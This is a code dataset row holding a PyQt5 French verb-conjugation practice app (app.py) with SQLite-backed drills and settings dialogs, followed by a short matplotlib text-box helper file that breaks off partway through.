9ea0c546a1e521014a32f12995b27d65c50cbaf0 | 34,133 | py | Python | app.py | luyaozou/conjugaison | c8d100b38e1067af17f428cba4af925465d5fd52 | [
"MIT"
]
| null | null | null | app.py | luyaozou/conjugaison | c8d100b38e1067af17f428cba4af925465d5fd52 | [
"MIT"
]
| null | null | null | app.py | luyaozou/conjugaison | c8d100b38e1067af17f428cba4af925465d5fd52 | [
"MIT"
]
| null | null | null | #! encoding = utf-8
""" Practice French conjugaison """
import sys
from os.path import isfile
from time import sleep
from sqlite3 import Error as dbError
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtGui import QTextOption, QKeySequence
from dictionary import TENSE_MOODS, PERSONS
from dictionary import conjug, conjug_all
from config import Config, from_json_, to_json
from lang import LANG_PKG
from db import AppDB
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.setMinimumWidth(600)
self.setMinimumHeight(700)
self.resize(QtCore.QSize(800, 750))
self.config = Config()
if isfile('config.json'):
from_json_(self.config, 'config.json')
self.config.nft = 0
self.config.nfc = 0
self.config.nbt = 0
self.config.nbc = 0
self.setWindowTitle(LANG_PKG[self.config.lang]['main_windowtitle'])
self.setStyleSheet('font-size: {:d}pt'.format(self.config.font_size))
self.db = AppDB('app.db')
centerWidget = QtWidgets.QWidget()
self.box1 = Box1(self.db, self.config, parent=self)
self.box2 = Box2(self.db, self.config, parent=self)
self.box3 = Box3(self.db, self.config, parent=self)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.setAlignment(QtCore.Qt.AlignHCenter)
thisLayout.setSpacing(10)
thisLayout.addWidget(self.box1)
thisLayout.addWidget(self.box2)
thisLayout.addWidget(self.box3)
centerWidget.setLayout(thisLayout)
# set central widget
self.setCentralWidget(centerWidget)
self.box1.btnCheck.clicked.connect(self.box3.btnClear.click)
self.box2.btnCheck.clicked.connect(self.box3.btnClear.click)
self.box1.btnGen.clicked.connect(self.box3.btnClear.click)
self.box2.btnGen.clicked.connect(self.box3.btnClear.click)
self.box1.btnHelp.clicked.connect(self._slot_help_box1)
self.box2.btnHelp.clicked.connect(self._slot_help_box2)
self.dConfig = DialogConfig(self.config, parent=self)
self.dPref = DialogPref(self.config, parent=self)
self.dAddVoc = DialogAddVoc(self.db, self.config, parent=self)
self.dBrowse = DialogBrowse(self.db, self.config, parent=self)
self.dStats = DialogStats(self.db, self.config, parent=self)
# apply config to dialogs
self.dConfig.set_tense_mood(self.config.enabled_tm_idx)
self.dPref.accepted.connect(self.apply_pref)
menubar = MenuBar(parent=self)
self.setMenuBar(menubar)
self.statusBar = StatusBar(self.config, parent=self)
self.setStatusBar(self.statusBar)
self.statusBar.refresh(*self.db.num_expired_entries(self.config.enabled_tm_idx))
self.box1.sig_checked.connect(lambda: self.statusBar.refresh(
*self.db.num_expired_entries(self.config.enabled_tm_idx)))
self.box2.sig_checked.connect(lambda: self.statusBar.refresh(
*self.db.num_expired_entries(self.config.enabled_tm_idx)))
menubar.actionConfig.triggered.connect(self._config)
menubar.actionPref.triggered.connect(self.dPref.exec)
menubar.actionAddVoc.triggered.connect(self.dAddVoc.exec)
menubar.actionBrowse.triggered.connect(self.dBrowse.exec)
menubar.actionStats.triggered.connect(self.dStats.exec)
self.statusBar.showMessage(LANG_PKG[self.config.lang]['status_bar_msg'],
1000)
self.setDisabled(True)
self.db.check_has_conjug()
self.setDisabled(False)
def _config(self):
# retrieve current checked tense mood pairs
self.dConfig.exec()
if self.dConfig.result() == QtWidgets.QDialog.Accepted:
tm_idx = self.dConfig.get_tense_mood()
if tm_idx:
# apply the new checked tms
self.config.enabled_tm_idx = tm_idx
self.box2.set_tm(self.config.enabled_tm_idx)
self.box3.set_tm(self.config.enabled_tm_idx)
self.statusBar.refresh(*self.db.num_expired_entries(tm_idx))
else:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['config_tm_warning_title'],
LANG_PKG[self.config.lang]['config_tm_warning_body'])
d.exec_()
# resume previous ones
self.dConfig.set_tense_mood(self.config.enabled_tm_idx)
else:
# resume previous ones
self.dConfig.set_tense_mood(self.config.enabled_tm_idx)
@QtCore.pyqtSlot()
def apply_pref(self):
sleep(0.02)
# apply font
self.setStyleSheet('font-size: {:d}pt'.format(self.config.font_size))
# apply language package
self.setWindowTitle(LANG_PKG[self.config.lang]['main_windowtitle'])
self.box1.apply_lang()
self.box2.apply_lang()
self.box3.apply_lang()
self.dPref.apply_lang()
self.dConfig.apply_lang()
self.dAddVoc.apply_lang()
self.dBrowse.apply_lang()
self.dStats.apply_lang()
self.menuBar().apply_lang(LANG_PKG[self.config.lang])
self.statusBar.refresh(*self.db.num_expired_entries(self.config.enabled_tm_idx))
@QtCore.pyqtSlot()
def _slot_help_box1(self):
verb, tense_mood = self.box1.ask_help()
self.box3.editVerb.setText(verb)
self.box3.comboTenseMood.setCurrentText(tense_mood)
self.box1.btnCheck.setDisabled(True)
@QtCore.pyqtSlot()
def _slot_help_box2(self):
verb, tense_mood = self.box2.ask_help()
self.box3.editVerb.setText(verb)
self.box3.comboTenseMood.setCurrentText(tense_mood)
self.box2.btnCheck.setDisabled(True)
def closeEvent(self, ev):
self.db.update_stat(self.config.nft, self.config.nfc,
self.config.nbt, self.config.nbc)
# close database
self.db.close()
# save setting to local file
self.dPref.fetch_config()
to_json(self.config, 'config.json')
class Box1(QtWidgets.QGroupBox):
sig_checked = QtCore.pyqtSignal()
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.setTitle(LANG_PKG[config.lang]['box1_title'])
self._timer = QtCore.QTimer()
self._timer.setSingleShot(True)
self._timer.setInterval(1000)
self._timer.timeout.connect(self._gen)
self.lblVerb = QtWidgets.QLabel()
self.lblVerb.setStyleSheet('font-size: 14pt; color: #2c39cf; font: bold; ')
self.lblTense = QtWidgets.QLabel()
self.lblTense.setFixedWidth(150)
self.lblMood = QtWidgets.QLabel()
self.lblMood.setFixedWidth(150)
self.lblPerson = QtWidgets.QLabel()
self.editInput = QtWidgets.QLineEdit()
self.btnGen = QtWidgets.QPushButton(LANG_PKG[config.lang]['box1_btnGen'])
self.btnCheck = QtWidgets.QPushButton(LANG_PKG[config.lang]['box1_btnCheck'])
self.btnCheck.setToolTip('Shift + Enter')
self.btnCheck.setShortcut(QKeySequence(QtCore.Qt.SHIFT | QtCore.Qt.Key_Return))
self.lblCk = QtWidgets.QLabel()
self.lblCk.setFixedWidth(30)
self.lblExp = QtWidgets.QLabel()
self.lblExp.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Minimum)
self.btnHelp = QtWidgets.QPushButton(LANG_PKG[config.lang]['box1_btnHelp'])
self.btnHelp.setToolTip('Ctrl + Shift + Enter')
self.btnHelp.setShortcut(QKeySequence(QtCore.Qt.CTRL | QtCore.Qt.SHIFT | QtCore.Qt.Key_Return))
self._answer = '*' # to avoid matching empty input and give false correct
self._entry_id = -1
self._tm_idx = -1
row1 = QtWidgets.QHBoxLayout()
row1.setAlignment(QtCore.Qt.AlignLeft)
row1.addWidget(self.lblVerb)
row1.addWidget(self.lblExp)
row2 = QtWidgets.QHBoxLayout()
row2.addWidget(self.lblTense)
row2.addWidget(self.lblMood)
row2.addWidget(self.lblPerson)
row2.addWidget(self.editInput)
row2.addWidget(self.lblCk)
row3 = QtWidgets.QHBoxLayout()
row3.setAlignment(QtCore.Qt.AlignRight)
row3.addWidget(self.btnGen)
row3.addWidget(self.btnCheck)
row3.addWidget(self.btnHelp)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.setSpacing(10)
thisLayout.setAlignment(QtCore.Qt.AlignHCenter)
thisLayout.addLayout(row1)
thisLayout.addLayout(row2)
thisLayout.addLayout(row3)
self.setLayout(thisLayout)
self.btnGen.clicked.connect(self._gen)
self.btnCheck.clicked.connect(self._ck)
def _gen(self):
""" Generate a verb & a conjugaison """
# clear previous result
self.lblCk.clear()
self.editInput.clear()
# draw random verb until there is a valid conjugation
# this is to avoid those few special verbs that do not have full conjug.
try:
while True:
# every <retry_intvl> practices, retrieve the verb with
# maximum incorrect number and try again
if not (self.config.nft % self.config.retry_intvl):
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_forward', self.config.enabled_tm_idx,
order='correct_num ASC')
else: # randomly select a verb
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_forward', self.config.enabled_tm_idx)
tense, mood = TENSE_MOODS[tm_idx]
answer = conjug(verb, tense, mood, pers_idx)
if answer:
self.lblVerb.setText(verb)
self.lblExp.setText(explanation)
self.lblPerson.setText(PERSONS[pers_idx])
if mood == 'impératif':
pass
else:
self.editInput.setText(PERSONS[pers_idx])
self.lblTense.setText(tense)
self.lblMood.setText(mood)
self.editInput.setFocus()
self._answer = answer
self._entry_id = entry_id
self._tm_idx = tm_idx
self.config.nft += 1 # add 1 to n total forward
self.btnCheck.setDisabled(False)
break
except ValueError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Critical,
LANG_PKG[self.config.lang]['msg_error_title'], str(err))
d.exec_()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry'])
d.exec_()
except KeyError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_config'].format(str(err))
)
d.exec_()
def _ck(self):
""" Check the answer """
txt = self.editInput.text()
# remove extra spaces and only put 1
txt_striped = ' '.join(txt.split())
if txt_striped == self._answer:
self.lblCk.setText('✓')
self.lblCk.setStyleSheet('font-size: 14pt; font: bold; color: #009933')
self.config.nfc += 1
self._timer.start()
else:
self.lblCk.setText('🞪')
self.lblCk.setStyleSheet('font-size: 14pt; font: bold; color: #D63333')
try:
self.db.update_res('practice_forward', self._entry_id, txt_striped == self._answer)
self.sig_checked.emit()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry']
)
d.exec_()
def ask_help(self):
return self.lblVerb.text(), ', '.join(TENSE_MOODS[self._tm_idx])
def apply_lang(self):
self.setTitle(LANG_PKG[self.config.lang]['box1_title'])
self.btnGen.setText(LANG_PKG[self.config.lang]['box1_btnGen'])
self.btnCheck.setText(LANG_PKG[self.config.lang]['box1_btnCheck'])
self.btnHelp.setText(LANG_PKG[self.config.lang]['box1_btnHelp'])
class Box2(QtWidgets.QGroupBox):
sig_checked = QtCore.pyqtSignal()
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.setTitle(LANG_PKG[config.lang]['box2_title'])
self._timer = QtCore.QTimer()
self._timer.setSingleShot(True)
self._timer.setInterval(1000)
self._timer.timeout.connect(self._gen)
self.btnGen = QtWidgets.QPushButton(LANG_PKG[config.lang]['box2_btnGen'])
self.btnCheck = QtWidgets.QPushButton(LANG_PKG[config.lang]['box2_btnCheck'])
self.btnCheck.setToolTip('Alt + Enter')
self.btnCheck.setShortcut(QKeySequence(QtCore.Qt.ALT | QtCore.Qt.Key_Return))
self.btnHelp = QtWidgets.QPushButton(LANG_PKG[config.lang]['box2_btnHelp'])
self.btnHelp.setToolTip('Shift + Alt + Enter')
self.btnHelp.setShortcut(QKeySequence(QtCore.Qt.SHIFT | QtCore.Qt.ALT | QtCore.Qt.Key_Return))
self.editVerb = QtWidgets.QLineEdit()
self.comboTenseMood = QtWidgets.QComboBox()
self.comboTenseMood.setFixedWidth(300)
self.set_tm(self.config.enabled_tm_idx)
self.lblCk = QtWidgets.QLabel()
self.lblCk.setFixedWidth(30)
self.lblConjug = QtWidgets.QLabel()
self.lblConjug.setStyleSheet('font-size: 14pt; color: #2c39cf; font: bold; ')
self.lblAns = QtWidgets.QLabel()
self.lblAns.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
self.btnGen.clicked.connect(self._gen)
self.btnCheck.clicked.connect(self._ck)
row2 = QtWidgets.QHBoxLayout()
self.lblInf = QtWidgets.QLabel(LANG_PKG[config.lang]['box2_lblInf'])
row2.addWidget(self.lblInf)
row2.addWidget(self.editVerb)
row2.addWidget(self.comboTenseMood)
row2.addWidget(self.lblCk)
row3 = QtWidgets.QHBoxLayout()
row3.setAlignment(QtCore.Qt.AlignRight)
row3.addWidget(self.lblAns)
row3.addWidget(self.btnGen)
row3.addWidget(self.btnCheck)
row3.addWidget(self.btnHelp)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.setAlignment(QtCore.Qt.AlignHCenter)
thisLayout.setSpacing(10)
thisLayout.addWidget(self.lblConjug)
thisLayout.addLayout(row2)
thisLayout.addLayout(row3)
self.setLayout(thisLayout)
self.editVerb.editingFinished.connect(self.comboTenseMood.setFocus)
self._answer = '*' # to avoid matching empty string and give false correct
self._entry_id = -1
self._tm_idx = -1
def set_tm(self, checked_tm_idx):
""" set tense mood options """
self.comboTenseMood.clear()
self.comboTenseMood.addItems([', '.join(TENSE_MOODS[i]) for i in checked_tm_idx])
self.comboTenseMood.adjustSize()
def _gen(self):
""" Generate a conjugaison """
# clear previous result
self.lblCk.clear()
self.editVerb.clear()
# draw random verb until there is a valid conjugation
# this is to avoid those few special verbs that do not have full conjug.
try:
while True:
# every <retry_intvl> practices, retrieve the verb with
# maximum incorrect number and try again
if not (self.config.nbt % self.config.retry_intvl):
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_backward', self.config.enabled_tm_idx,
order='correct_num ASC')
else: # randomly select a verb
entry_id, verb, explanation, tm_idx, pers_idx = self.db.choose_verb(
'practice_backward', self.config.enabled_tm_idx)
tense, mood = TENSE_MOODS[tm_idx]
conjug_str = conjug(verb, tense, mood, pers_idx)
if conjug_str:
self.lblConjug.setText(conjug_str)
self.lblAns.clear()
self.editVerb.setFocus()
self._answer = verb
self._entry_id = entry_id
self._tm_idx = tm_idx
self.config.nbt += 1 # add 1 to n total forward
self.btnCheck.setDisabled(False)
break
except ValueError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Critical,
LANG_PKG[self.config.lang]['msg_error_title'], str(err))
d.exec_()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry'])
d.exec_()
except KeyError as err:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_config'].format(str(err))
)
d.exec_()
def _ck(self):
""" Check the answer """
is_correct = self.editVerb.text().lower() == self._answer and \
self.comboTenseMood.currentText() == ', '.join(TENSE_MOODS[self._tm_idx])
if is_correct:
self.lblCk.setText('✓')
self.lblCk.setStyleSheet('font-size: 14pt; color: #009933')
self.config.nbc += 1
self._timer.start(1000)
else:
self.lblCk.setText('🞪')
self.lblCk.setStyleSheet('font-size: 14pt; color: #D63333')
self.lblAns.setText(' '.join((self._answer,) + TENSE_MOODS[self._tm_idx]))
self.btnCheck.setDisabled(True)
self._timer.start(5000)
try:
self.db.update_res('practice_backward', self._entry_id, is_correct)
self.sig_checked.emit()
except TypeError:
d = QtWidgets.QMessageBox(
QtWidgets.QMessageBox.Warning,
LANG_PKG[self.config.lang]['msg_warning_title'],
LANG_PKG[self.config.lang]['msg_warning_no_entry']
)
d.exec_()
def ask_help(self):
return self._answer, ', '.join(TENSE_MOODS[self._tm_idx])
def apply_lang(self):
self.setTitle(LANG_PKG[self.config.lang]['box2_title'])
self.btnGen.setText(LANG_PKG[self.config.lang]['box2_btnGen'])
self.btnCheck.setText(LANG_PKG[self.config.lang]['box2_btnCheck'])
self.btnHelp.setText(LANG_PKG[self.config.lang]['box2_btnHelp'])
self.lblInf.setText(LANG_PKG[self.config.lang]['box2_lblInf'])
class Box3(QtWidgets.QGroupBox):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.config = config
self.db = db
self.setTitle(LANG_PKG[config.lang]['box3_title'])
self.editVerb = QtWidgets.QLineEdit()
self.comboTenseMood = QtWidgets.QComboBox()
self.comboTenseMood.setFixedWidth(300)
self.comboTenseMood.addItems([', '.join(TENSE_MOODS[i]) for i in config.enabled_tm_idx])
self.btnClear = QtWidgets.QPushButton(LANG_PKG[config.lang]['box3_btnClear'])
self.lblExp = QtWidgets.QLabel()
self.lblExp.setWordWrap(True)
self.lblExp.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Minimum)
self.lblResult = QtWidgets.QTextEdit()
self.lblResult.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)
self.lblResult.setReadOnly(True)
self.btnClear.clicked.connect(self._clear)
self.editVerb.editingFinished.connect(self._search)
self.comboTenseMood.currentIndexChanged.connect(self._search)
row1 = QtWidgets.QHBoxLayout()
row1.addWidget(self.editVerb)
row1.addWidget(self.comboTenseMood)
row1.addWidget(self.btnClear)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addLayout(row1)
thisLayout.addWidget(self.lblExp)
thisLayout.addWidget(self.lblResult)
self.setLayout(thisLayout)
def set_tm(self, checked_tm_idx):
""" set tense mood options """
self.comboTenseMood.clear()
self.comboTenseMood.addItems([', '.join(TENSE_MOODS[i]) for i in checked_tm_idx])
def _search(self):
try:
verb = self.editVerb.text().strip()
tense, mood = self.comboTenseMood.currentText().split(', ')
self.lblResult.clear()
self.lblResult.setText('\n'.join(conjug_all(verb, tense, mood)))
self.lblExp.setText(self.db.get_explanation(verb))
except (KeyError, TypeError):
self.lblResult.clear()
self.lblExp.clear()
except (ValueError, IndexError) as err:
self.lblResult.setText(str(err))
self.lblExp.clear()
except dbError:
self.lblResult.setText(LANG_PKG[self.config.lang]['box3_db_error'])
self.lblExp.clear()
def _clear(self):
self.editVerb.clear()
self.lblExp.clear()
self.lblResult.clear()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['box3_title'])
self.btnClear.setText(LANG_PKG[self.config.lang]['box3_btnClear'])
class DialogConfig(QtWidgets.QDialog):
def __init__(self, config, parent=None):
super().__init__(parent)
self.config = config
ckLayout = QtWidgets.QVBoxLayout()
self._cklist = []
for i, _tm in enumerate(TENSE_MOODS):
ck = QtWidgets.QCheckBox(", ".join(_tm))
self._cklist.append(ck)
ckLayout.addWidget(ck)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
self.btnOk = QtWidgets.QPushButton('Okay')
self.btnCancel = QtWidgets.QPushButton("Cancel")
btnLayout.addWidget(self.btnCancel)
btnLayout.addWidget(self.btnOk)
self.apply_lang()
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addLayout(ckLayout)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self.btnCancel.clicked.connect(self.reject)
self.btnOk.clicked.connect(self.accept)
def get_tense_mood(self):
checked_tense_moods = []
for i, ck in enumerate(self._cklist):
if ck.isChecked():
checked_tense_moods.append(i)
return checked_tense_moods
def set_tense_mood(self, tm_idx):
for i, ck in enumerate(self._cklist):
if ck.isEnabled():
ck.setChecked(i in tm_idx)
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_config_title'])
self.btnOk.setText(LANG_PKG[self.config.lang]['btnOK'])
self.btnCancel.setText(LANG_PKG[self.config.lang]['btnCancel'])
class DialogPref(QtWidgets.QDialog):
def __init__(self, config, parent=None):
super().__init__(parent)
self.config = config
self.setWindowTitle('Configure Preferences')
self.lblIntvl = QtWidgets.QLabel()
self.inpIntvl = QtWidgets.QSpinBox()
self.inpIntvl.setMinimum(1)
self.inpIntvl.setValue(config.retry_intvl)
self.lblLang = QtWidgets.QLabel()
self.lblFontSize = QtWidgets.QLabel()
self.inpFontSize = QtWidgets.QSpinBox()
self.inpFontSize.setMinimum(10)
self.inpFontSize.setSuffix(' pt')
self.inpFontSize.setValue(config.font_size)
self.comboLang = QtWidgets.QComboBox()
self.comboLang.addItems(list(LANG_PKG.keys()))
self.comboLang.setCurrentText(config.lang)
prefLayout = QtWidgets.QFormLayout()
prefLayout.addRow(self.lblIntvl, self.inpIntvl)
prefLayout.addRow(self.lblLang, self.comboLang)
prefLayout.addRow(self.lblFontSize, self.inpFontSize)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
self.btnOk = QtWidgets.QPushButton('Okay')
self.btnCancel = QtWidgets.QPushButton("Cancel")
self.btnOk.setDefault(True)
btnLayout.addWidget(self.btnCancel)
btnLayout.addWidget(self.btnOk)
self.apply_lang()
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addLayout(prefLayout)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self.btnCancel.clicked.connect(self.reject)
self.btnOk.clicked.connect(self.accept)
self.accepted.connect(self.fetch_config)
def fetch_config(self):
self.config.lang = list(LANG_PKG.keys())[self.comboLang.currentIndex()]
self.config.retry_intvl = self.inpIntvl.value()
self.config.font_size = self.inpFontSize.value()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_pref_title'])
self.lblIntvl.setText(LANG_PKG[self.config.lang]['dialog_pref_lblIntvl'])
self.lblIntvl.setToolTip(LANG_PKG[self.config.lang]['dialog_pref_lblIntvl_tooltip'])
self.lblLang.setText(LANG_PKG[self.config.lang]['dialog_pref_lblLang'])
self.lblFontSize.setText(LANG_PKG[self.config.lang]['dialog_pref_lblFont'])
current_idx = self.comboLang.currentIndex()
self.comboLang.clear()
self.comboLang.addItems(LANG_PKG[self.config.lang]['dialog_pref_comboLang'])
self.comboLang.setCurrentIndex(current_idx)
self.btnOk.setText(LANG_PKG[self.config.lang]['btnOK'])
self.btnCancel.setText(LANG_PKG[self.config.lang]['btnCancel'])
class DialogAddVoc(QtWidgets.QDialog):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.btnAdd = QtWidgets.QPushButton('Add')
self.btnCancel = QtWidgets.QPushButton('Cancel')
self.btnUpdate = QtWidgets.QPushButton('Update')
self.editVerb = QtWidgets.QLineEdit()
self.editExp = QtWidgets.QTextEdit()
self.editExp.setWordWrapMode(QTextOption.WordWrap)
self.editExp.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)
self.btnAdd.setDefault(True)
self.btnUpdate.setAutoDefault(True)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
btnLayout.addWidget(self.btnCancel)
btnLayout.addWidget(self.btnUpdate)
btnLayout.addWidget(self.btnAdd)
self.btnAdd.clicked.connect(self._add)
self.btnCancel.clicked.connect(self.reject)
self.btnUpdate.clicked.connect(self._update)
self.editVerb.editingFinished.connect(self._check_exist)
self.lblVerb = QtWidgets.QLabel('Verb')
self.lblExp = QtWidgets.QLabel('Explanation')
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addWidget(self.lblVerb)
thisLayout.addWidget(self.editVerb)
thisLayout.addWidget(self.lblExp)
thisLayout.addWidget(self.editExp)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self.apply_lang()
def _add(self):
verb = self.editVerb.text().strip()
explanation = self.editExp.toPlainText().strip()
self.db.add_voc(verb, explanation)
self.editVerb.clear()
self.editExp.clear()
def _update(self):
verb = self.editVerb.text().strip()
explanation = self.editExp.toPlainText().strip()
self.db.update_voc(verb, explanation)
self.editVerb.clear()
self.editExp.clear()
def _check_exist(self):
verb = self.editVerb.text().strip()
is_exist = self.db.check_exist(verb)
if is_exist:
self.btnAdd.setDisabled(True)
self.btnUpdate.setDisabled(False)
self.editExp.setText(self.db.get_explanation(verb))
else:
self.btnAdd.setDisabled(False)
self.btnUpdate.setDisabled(True)
self.editExp.clear()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_addvoc_title'])
self.btnAdd.setText(LANG_PKG[self.config.lang]['dialog_addvoc_btnAdd'])
self.btnCancel.setText(LANG_PKG[self.config.lang]['dialog_addvoc_btnCancel'])
self.btnUpdate.setText(LANG_PKG[self.config.lang]['dialog_addvoc_btnUpdate'])
self.lblVerb.setText(LANG_PKG[self.config.lang]['dialog_addvoc_lblVerb'])
self.lblExp.setText(LANG_PKG[self.config.lang]['dialog_addvoc_lblExp'])
class DialogBrowse(QtWidgets.QDialog):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.setWindowTitle(LANG_PKG[config.lang]['dialog_browse_title'])
self.setWindowFlags(QtCore.Qt.Window)
self.setMinimumWidth(900)
self.resize(QtCore.QSize(900, 600))
self.setModal(False)
self.btnRefresh = QtWidgets.QPushButton(LANG_PKG[config.lang]['dialog_browse_btnRefresh'])
self.btnRefresh.clicked.connect(self._refresh)
btnLayout = QtWidgets.QHBoxLayout()
btnLayout.setAlignment(QtCore.Qt.AlignRight)
btnLayout.addWidget(self.btnRefresh)
self.dbTable = QtWidgets.QTableWidget()
area = QtWidgets.QScrollArea()
area.setWidget(self.dbTable)
area.setWidgetResizable(True)
area.setAlignment(QtCore.Qt.AlignTop)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addWidget(area)
thisLayout.addLayout(btnLayout)
self.setLayout(thisLayout)
self._refresh()
def _refresh(self):
self.dbTable.clearContents()
records = self.db.get_glossary()
rows = len(records)
self.dbTable.setRowCount(rows)
self.dbTable.setColumnCount(2)
for row, rec in enumerate(records):
for col, x in enumerate(rec):
item = QtWidgets.QTableWidgetItem(str(x))
self.dbTable.setItem(row, col, item)
self.dbTable.resizeRowsToContents()
self.dbTable.resizeColumnsToContents()
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_browse_title'])
self.btnRefresh.setText(LANG_PKG[self.config.lang]['dialog_browse_btnRefresh'])
class DialogStats(QtWidgets.QDialog):
def __init__(self, db, config, parent=None):
super().__init__(parent)
self.db = db
self.config = config
self.lbl = QtWidgets.QLabel()
self.lbl.setWordWrap(True)
self.lbl.setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
thisLayout = QtWidgets.QVBoxLayout()
thisLayout.addWidget(self.lbl)
self.setLayout(thisLayout)
def showEvent(self, ev):
self.lbl.setText(self.db.get_stats())
def apply_lang(self):
self.setWindowTitle(LANG_PKG[self.config.lang]['dialog_stats_title'])
class MenuBar(QtWidgets.QMenuBar):
def __init__(self, parent=None):
super().__init__(parent)
self.actionConfig = QtWidgets.QAction("Config Tense and Mood")
self.actionPref = QtWidgets.QAction('Preference')
self.actionAddVoc = QtWidgets.QAction("Add Vocabulary")
self.actionAddVoc.setShortcut('Ctrl+N')
self.actionBrowse = QtWidgets.QAction("Browse Glossary")
self.actionStats = QtWidgets.QAction('Statistics')
self.menuConfig = self.addMenu("&Config")
self.menuConfig.addAction(self.actionConfig)
self.menuConfig.addAction(self.actionPref)
self.menuGloss = self.addMenu("&Glossary")
self.menuGloss.addAction(self.actionAddVoc)
self.menuGloss.addAction(self.actionBrowse)
self.menuStats = self.addMenu("&Statistics")
self.menuStats.addAction(self.actionStats)
def apply_lang(self, lang_pkg):
self.actionConfig.setText(lang_pkg['action_config'])
self.actionPref.setText(lang_pkg['action_pref'])
self.actionAddVoc.setText(lang_pkg['action_addvoc'])
self.actionBrowse.setText(lang_pkg['action_browse'])
self.actionStats.setText(lang_pkg['action_stats'])
self.menuConfig.setTitle(lang_pkg['menu_config'])
self.menuGloss.setTitle(lang_pkg['menu_glossary'])
self.menuStats.setTitle(lang_pkg['menu_stats'])
class StatusBar(QtWidgets.QStatusBar):
def __init__(self, config, parent=None):
super().__init__(parent)
self.config = config
self.labelN1 = QtWidgets.QLabel()
self.labelN2 = QtWidgets.QLabel()
self.addPermanentWidget(self.labelN1)
self.addPermanentWidget(self.labelN2)
def refresh(self, n1, n2):
self.labelN1.setText(LANG_PKG[self.config.lang]['status_msg1'].format(n1))
self.labelN2.setText(LANG_PKG[self.config.lang]['status_msg2'].format(n2))
def launch():
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
launch()
| 40.538005 | 103 | 0.637213 | 33,516 | 0.981607 | 0 | 0 | 1,169 | 0.034237 | 0 | 0 | 3,338 | 0.097762 |
9ea2e6bc949b1feeca26b6c53dd72ef93834de53 | 2,515 | py | Python | python/lib/viewer/bluf/plot_func.py | timtyree/bgmc | 891e003a9594be9e40c53822879421c2b8c44eed | [
"MIT"
]
| null | null | null | python/lib/viewer/bluf/plot_func.py | timtyree/bgmc | 891e003a9594be9e40c53822879421c2b8c44eed | [
"MIT"
]
| null | null | null | python/lib/viewer/bluf/plot_func.py | timtyree/bgmc | 891e003a9594be9e40c53822879421c2b8c44eed | [
"MIT"
]
| null | null | null | import matplotlib.pyplot as plt, numpy as np, pandas as pd
# general functions for plotting
# Tim Tyree
# 7.23.2021
def PlotTextBox(ax,text,text_width=150.,xcenter=0.5,ycenter=0.5,fontsize=20, family='serif', style='italic',horizontalalignment='center',
verticalalignment='center', color='black',use_turnoff_axis=True,**kwargs):
txt=ax.text(xcenter,ycenter,text,horizontalalignment=horizontalalignment,
verticalalignment=verticalalignment, transform = ax.transAxes, fontsize=fontsize, color='black', wrap=True,**kwargs)
txt._get_wrap_line_width = lambda : text_width
if use_turnoff_axis:
ax.axis('off')
def text_plotter_function(ax,data):
text=data
# ax.text(0.5, 0.5, text, family='serif', style='italic', ha='right', wrap=True)
